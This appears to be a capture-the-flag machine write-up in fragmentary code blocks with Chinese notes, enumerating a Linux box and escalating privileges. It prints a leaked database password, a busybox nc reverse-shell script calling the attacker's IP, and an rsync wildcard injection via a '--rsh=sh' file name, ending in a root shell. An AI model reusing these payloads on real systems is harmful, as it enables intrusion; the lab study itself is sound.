╔══════════╣ Unmounted file-system?
49
╚ Check if you can mount umounted devices
50
UUID=80e68759-1ca0-45eb-82a7-601b1f78dfe5 /               ext4    errors=remount-ro 0       1
51
UUID=257f425d-1ea4-4b8e-8dd8-69523f25d249 none            swap    sw              0       0
52
/dev/sr0        /media/cdrom0   udf,iso9660 user,noauto     0       0
53

54
╔══════════╣ Any sd*/disk* disk in /dev? (limit 20)
55
disk
56
sda
57
sda1
58
sda2
59
sda5
60

61
╔══════════╣ Environment
62
╚ Any private information inside environment variables?
63
USER=hyh
64
SSH_CLIENT=192.168.0.106 35646 22
65
SHLVL=1
66
HOME=/home/hyh
67
SSH_TTY=/dev/pts/1
68
LOGNAME=hyh
69
_=/tmp/linpeas.sh
70
TERM=xterm-256color
71
XDG_RUNTIME_DIR=/run/user/1001
72
LANG=en_US.UTF-8
73
SHELL=/bin/bash
74
PWD=/home/hyh
75
SSH_CONNECTION=192.168.0.106 35646 192.168.0.101 22
76

77
╔══════════╣ Searching Signature verification failed in dmesg
78
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed
79
dmesg Not Found
80

81
╔══════════╣ Executing Linux Exploit Suggester
82
╚ https://github.com/mzet-/linux-exploit-suggester
83
[+] [CVE-2019-13272] PTRACE_TRACEME
84

85
   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
86
   Exposure: highly probable
87
   Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
88
   Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
89
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
90
   Comments: Requires an active PolKit agent.
91

92
[+] [CVE-2021-4034] PwnKit
93

94
   Details: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
95
   Exposure: probable
96
   Tags: ubuntu=10|11|12|13|14|15|16|17|18|19|20|21,[ debian=7|8|9|10|11 ],fedora,manjaro
97
   Download URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
98

99
[+] [CVE-2021-3156] sudo Baron Samedit
100

101
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
102
   Exposure: less probable
103
   Tags: mint=19,ubuntu=18|20, debian=10
104
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
105

106
[+] [CVE-2021-3156] sudo Baron Samedit 2
107

108
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
109
   Exposure: less probable
110
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
111
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
112

113
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
114

115
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
116
   Exposure: less probable
117
   Tags: ubuntu=20.04{kernel:5.8.0-*}
118
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
119
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
120
   Comments: ip_tables kernel module must be loaded
121

122

123
╔══════════╣ Protections
124
═╣ AppArmor enabled? .............. You do not have enough privilege to read the profile set.
125
apparmor module is loaded.
126
═╣ AppArmor profile? .............. unconfined
127
═╣ is linuxONE? ................... s390x Not Found
128
═╣ grsecurity present? ............ grsecurity Not Found
129
═╣ PaX bins present? .............. PaX Not Found
130
═╣ Execshield enabled? ............ Execshield Not Found
131
═╣ SELinux enabled? ............... sestatus Not Found
132
═╣ Seccomp enabled? ............... disabled
133
═╣ User namespace? ................ enabled
134
═╣ Cgroup2 enabled? ............... enabled
135
═╣ Is ASLR enabled? ............... Yes
136
═╣ Printer? ....................... No
137
═╣ Is this a virtual machine? ..... Yes (oracle)
138

139
╔══════════╣ Kernel Modules Information
140
══╣ Kernel modules with weak perms?
141

142
══╣ Kernel modules loadable?
143
Modules can be loaded
144

145

146

147
                                   ╔═══════════╗
148
═══════════════════════════════════╣ Container ╠═══════════════════════════════════
149
                                   ╚═══════════╝
150
╔══════════╣ Container related tools present (if any):
151
/usr/sbin/apparmor_parser
152
/usr/bin/nsenter
153
/usr/bin/unshare
154
/usr/sbin/chroot
155
/usr/sbin/capsh
156
/usr/sbin/setcap
157
/usr/sbin/getcap
158

159
╔══════════╣ Container details
160
═╣ Is this a container? ........... No
161
═╣ Any running containers? ........ No

1
hyh@Guoqing:~/.weechat$ cat ~/.weechat/irc.conf
2
#
3
# weechat -- irc.conf
4
#
5
# WARNING: It is NOT recommended to edit this file by hand,
6
# especially if WeeChat is running.
7
#
8
# Use /set or similar command to change settings in WeeChat.
9
#
10
# For more info, see: https://weechat.org/doc/quickstart
11
#
12

13
[look]
14
buffer_open_before_autojoin = on
15
buffer_open_before_join = off
16
buffer_switch_autojoin = on
17
buffer_switch_join = on
18
color_nicks_in_names = off
19
color_nicks_in_nicklist = off
20
color_nicks_in_server_messages = on
21
color_pv_nick_like_channel = on
22
ctcp_time_format = "%a, %d %b %Y %T %z"
23
display_away = local
24
display_ctcp_blocked = on
25
display_ctcp_reply = on
26
display_ctcp_unknown = on
27
display_host_join = on
28
display_host_join_local = on
29
display_host_quit = on
30
display_join_message = "329,332,333,366"
31
display_old_topic = on
32
display_pv_away_once = on
33
display_pv_back = on
34
display_pv_warning_address = off
35
highlight_channel = "$nick"
36
highlight_pv = "$nick"
37
highlight_server = "$nick"
38
highlight_tags_restrict = "irc_privmsg,irc_notice"
39
item_channel_modes_hide_args = "k"
40
item_display_server = buffer_plugin
41
item_nick_modes = on
42
item_nick_prefix = on
43
join_auto_add_chantype = off
44
msgbuffer_fallback = current
45
new_channel_position = none
46
new_pv_position = none
47
nick_completion_smart = speakers
48
nick_mode = prefix
49
nick_mode_empty = off
50
nicks_hide_password = "nickserv"
51
notice_as_pv = auto
52
notice_welcome_redirect = on
53
notice_welcome_tags = ""
54
notify_tags_ison = "notify_message"
55
notify_tags_whois = "notify_message"
56
part_closes_buffer = off
57
pv_buffer = independent
58
pv_tags = "notify_private"
59
raw_messages = 256
60
server_buffer = merge_with_core
61
smart_filter = on
62
smart_filter_account = on
63
smart_filter_chghost = on
64
smart_filter_delay = 5
65
smart_filter_join = on
66
smart_filter_join_unmask = 30
67
smart_filter_mode = "+"
68
smart_filter_nick = on
69
smart_filter_quit = on
70
temporary_servers = off
71
topic_strip_colors = off
72

73
[color]
74
input_nick = lightcyan
75
item_channel_modes = default
76
item_lag_counting = default
77
item_lag_finished = yellow
78
item_nick_modes = default
79
message_account = cyan
80
message_chghost = brown
81
message_join = green
82
message_kick = red
83
message_quit = red
84
mirc_remap = "1,-1:darkgray"
85
nick_prefixes = "y:lightred;q:lightred;a:lightcyan;o:lightgreen;h:lightmagenta;v:yellow;*:lightblue"
86
notice = green
87
reason_kick = default
88
reason_quit = default
89
topic_current = default
90
topic_new = white
91
topic_old = default
92

93
[network]
94
autoreconnect_delay_growing = 2
95
autoreconnect_delay_max = 600
96
ban_mask_default = "*!$ident@$host"
97
colors_receive = on
98
colors_send = on
99
lag_check = 60
100
lag_max = 1800
101
lag_min_show = 500
102
lag_reconnect = 300
103
lag_refresh_interval = 1
104
notify_check_ison = 1
105
notify_check_whois = 5
106
sasl_fail_unavailable = on
107
send_unknown_commands = off
108
whois_double_nick = off
109

110
[msgbuffer]
111

112
[ctcp]
113

114
[ignore]
115

116
[server_default]
117
addresses = ""
118
anti_flood_prio_high = 2
119
anti_flood_prio_low = 2
120
autoconnect = off
121
autojoin = ""
122
autoreconnect = on
123
autoreconnect_delay = 10
124
autorejoin = off
125
autorejoin_delay = 30
126
away_check = 0
127
away_check_max_nicks = 25
128
capabilities = ""
129
charset_message = message
130
command = ""
131
command_delay = 0
132
connection_timeout = 60
133
ipv6 = on
134
local_hostname = ""
135
msg_kick = ""
136
msg_part = "WeeChat ${info:version}"
137
msg_quit = "WeeChat ${info:version}"
138
nicks = "hyh,hyh1,hyh2,hyh3,hyh4"
139
nicks_alternate = on
140
notify = ""
141
password = ""
142
proxy = ""
143
realname = ""
144
sasl_fail = continue
145
sasl_key = ""
146
sasl_mechanism = plain
147
sasl_password = ""
148
sasl_timeout = 15
149
sasl_username = ""
150
split_msg_max_length = 512
151
ssl = off
152
ssl_cert = ""
153
ssl_dhkey_size = 2048
154
ssl_fingerprint = ""
155
ssl_password = ""
156
ssl_priorities = "NORMAL:-VERS-SSL3.0"
157
ssl_verify = on
158
usermode = ""
159
username = "hyh"
160

161
[server]
162

163

164
hyh@Guoqing:~/.weechat$ cat ~/.weechat/sec.conf
165
#
166
# weechat -- sec.conf
167
#
168
# WARNING: It is NOT recommended to edit this file by hand,
169
# especially if WeeChat is running.
170
#
171
# Use /set or similar command to change settings in WeeChat.
172
#
173
# For more info, see: https://weechat.org/doc/quickstart
174
#
175

176
[crypt]
177
cipher = aes256
178
hash_algo = sha256
179
passphrase_file = ""
180
salt = on
181

182
[data]
183

184

185
hyh@Guoqing:~/.weechat$ cd ~/.weechat/logs
186
hyh@Guoqing:~/.weechat/logs$ ls -lah
187
total 12K
188
drwx------ 2 hyh hyh 4.0K Jan 17 07:31 .
189
drwxr-xr-x 8 hyh hyh 4.0K Jan 17 07:33 ..
190
-rw-r--r-- 1 hyh hyh 2.9K Jan 17 07:35 core.weechat.weechatlog
191
hyh@Guoqin
192

193
hyh@Guoqing:~/.weechat/logs$ ls -lah
194
total 12K
195
drwx------ 2 hyh hyh 4.0K Jan 17 07:31 .
196
drwxr-xr-x 8 hyh hyh 4.0K Jan 17 07:33 ..
197
-rw-r--r-- 1 hyh hyh 2.9K Jan 17 07:35 core.weechat.weechatlog
198

199

200
hyh@Guoqing:~/.weechat/logs$ cat core.weechat.weechatlog
201
2026-01-17 07:31:59             New key binding (context "default"): meta2-1;5P => /bar scroll buflist * -100%
202
2026-01-17 07:31:59             New key binding (context "default"): meta2-1;5Q => /bar scroll buflist * +100%
203
2026-01-17 07:31:59             New key binding (context "default"): meta-meta-OQ => /bar scroll buflist * e
204
2026-01-17 07:31:59             New key binding (context "default"): meta2-1;3Q => /bar scroll buflist * e
205
2026-01-17 07:31:59             New key binding (context "default"): meta2-1;3P => /bar scroll buflist * b
206
2026-01-17 07:31:59             New key binding (context "default"): meta-meta-OP => /bar scroll buflist * b
207
2026-01-17 07:31:59             New key binding (context "default"): meta-B => /buflist toggle
208
2026-01-17 07:31:59             New key binding (context "default"): meta-OQ => /bar scroll buflist * +100%
209
2026-01-17 07:31:59             New key binding (context "default"): meta-OP => /bar scroll buflist * -100%
210
2026-01-17 07:31:59             New key binding (context "default"): meta-meta2-12~ => /bar scroll buflist * e
211
2026-01-17 07:31:59             New key binding (context "default"): meta-meta2-11~ => /bar scroll buflist * b
212
2026-01-17 07:31:59             New key binding (context "default"): meta2-12^ => /bar scroll buflist * +100%
213
2026-01-17 07:31:59             New key binding (context "default"): meta2-12~ => /bar scroll buflist * +100%
214
2026-01-17 07:31:59             New key binding (context "default"): meta2-11^ => /bar scroll buflist * -100%
215
2026-01-17 07:31:59             New key binding (context "default"): meta2-11~ => /bar scroll buflist * -100%
216
2026-01-17 07:31:59             Plugins loaded: alias, buflist, charset, exec, fifo, fset, irc, logger, perl, python, relay, ruby, script, spell, trigger, xfer
217
2026-01-17 07:32:45     =!=     You can not write text in this buffer
218
2026-01-17 07:32:48     =!=     You can not write text in this buffer
219
2026-01-17 07:32:55     =!=     You can not write text in this buffer
220
2026-01-17 07:33:33     =!=     Error: WeeChat main buffer can't be closed
221
2026-01-17 07:33:44             fifo: pipe closed
222
2026-01-17 07:33:49             Plugins loaded: alias, buflist, charset, exec, fifo, fset, irc, logger, perl, python, relay, ruby, script, spell, trigger, xfer
223
2026-01-17 07:34:28     =!=     irc: unable to add temporary server "127.0.0.1/6667" because the addition of temporary servers with command /connect is currently disabled
224
2026-01-17 07:34:28     =!=     irc: if you want to add a standard server, use the command "/server add" (see /help server); if you really want to add a temporary server (NOT SAVED), turn on the option irc.look.temporary_servers
225
2026-01-17 07:34:44     =!=     irc: unable to add temporary server "127.0.0.1/7000" because the addition of temporary servers with command /connect is currently disabled
226
2026-01-17 07:34:44     =!=     irc: if you want to add a standard server, use the command "/server add" (see /help server); if you really want to add a temporary server (NOT SAVED), turn on the option irc.look.temporary_servers
227
2026-01-17 07:34:49     =!=     irc: command "list" must be executed on irc buffer (server, channel or private)
228

229
hyh@Guoqing:~/.weechat/logs$ ls ~/.weechat/python
230
autoload
231
hyh@Guoqing:~/.weechat/logs$ cd ~/.weechat/python
232
hyh@Guoqing:~/.weechat/python$ cd autoload/
233
hyh@Guoqing:~/.weechat/python/autoload$ ls
234
hyh@Guoqing:~/.weechat/python/autoload$ ls -al
235
total 8
236
drwxr-xr-x 2 hyh hyh 4096 Jan 17 07:31 .
237
drwxr-xr-x 3 hyh hyh 4096 Jan 17 07:31 ..
238
hyh@Guoqing:~/.weechat/python/autoload$

1
hyh@Guoqing:~$ find /usr/local/bin -type f -executable -ls 2>/dev/null
2
   286861      4 -rwxr-xr-x   1 root     root          248 Apr  1  2025 /usr/local/bin/calc-prorate
3
hyh@Guoqing:~$ cat /usr/local/bin/calc-prorate
4
#!/usr/bin/python3
5
# -*- coding: utf-8 -*-
6
import re
7
import sys
8
from tempora import calculate_prorated_values
9
if __name__ == '__main__':
10
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
11
    sys.exit(calculate_prorated_values())
12
hyh@Guoqing:~$

1
-rwxr-xr-x 1 root root

1
无 SUID
2

3
无 capability
4

5
普通 root-owned 可执行文件

1
不接收外部参数
2

3
不读文件
4

5
不执行 shell
6

7
不涉及用户

1
Segmentation fault (core dumped)

1
DB_USER = admin
2
DB_PASS = toddishandsome
3
DB_NAME = login_system
4

5
mysql -u admin -p
6
# 密码：toddishandsome
7
试了下
8
里面没翻出来啥也没办法提权

1
hyh@Guoqing:/home/segfault$ cat name1.txt
2
sublarge
3
hyh@Guoqing:/home/segfault$ cat name2.txt
4
bamuwe
5
hyh@Guoqing:/home/segfault$ cat name3.txt
6
LingM

1
2026/01/18 00:40:01 CMD: UID=0     PID=1368   | /usr/sbin/CRON -f
2
2026/01/18 00:40:01 CMD: UID=0     PID=1369   | /usr/sbin/CRON -f
3
2026/01/18 00:40:01 CMD: UID=0     PID=1370   | /bin/sh -c cd /home/segfault &&
4
rsync -t *.txt Guoqing:/tmp/backup/
5
2026/01/18 00:40:01 CMD: UID=0     PID=1371   | rsync -t name1.txt name2.txt
6
name3.txt Guoqing:/tmp/backup/
7
2026/01/18 00:40:01 CMD: UID=0     PID=1372   | sshd: /usr/sbin/sshd -D
8
[listener] 0 of 10-100 startups
9
2026/01/18 00:40:01 CMD: UID=0     PID=1373   | sshd: [accepted]

1
rsync -t name1.txt name2.txt name3.txt Guoqing:/tmp/backup/

1
#!/bin/sh
2
busybox nc 192.168.0.106 4444 -e /bash/sh

1
segfault@Guoqing:~$ echo '#!/bin/sh' >> hh.txt
2
segfault@Guoqing:~$ echo 'busybox nc 192.168.0.106 4444-e /bin/sh' >> hh.txt
3
segfault@Guoqing:~$ chmod +x hh.txt
4
segfault@Guoqing:~$ echo "" > '--rsh=sh hh.txt'

1
2026/01/18 00:59:01 CMD: UID=0     PID=1515   | /usr/sbin/CRON -f
2
2026/01/18 00:59:01 CMD: UID=0     PID=1516   | /bin/sh -c cd /home/segfault &&
3
rsync -t *.txt Guoqing:/tmp/backup/
4
2026/01/18 00:59:01 CMD: UID=0     PID=1517   | rsync -t --rsh=sh hh.txt -e sh
5
hh.txt hh.txt name1.txt name2.txt name3.txt Guoqing:/tmp/backup/
6
2026/01/18 00:59:01 CMD: UID=0     PID=1518   | sh hh.txt Guoqing rsync --server
7
-te.LsfxCIvu . /tmp/backup/
8
2026/01/18 00:59:01 CMD: UID=0     PID=1519   | /bin/sh

1
┌──(root㉿xhhui)-[/usr/share/pspy]
2
└─# nc -lvnp 6666
3
listening on [any] 6666 ...
4
id
5
connect to [192.168.56.247] from (UNKNOWN) [192.168.56.170] 44252
6
uid=0(root) gid=0(root) groups=0(root)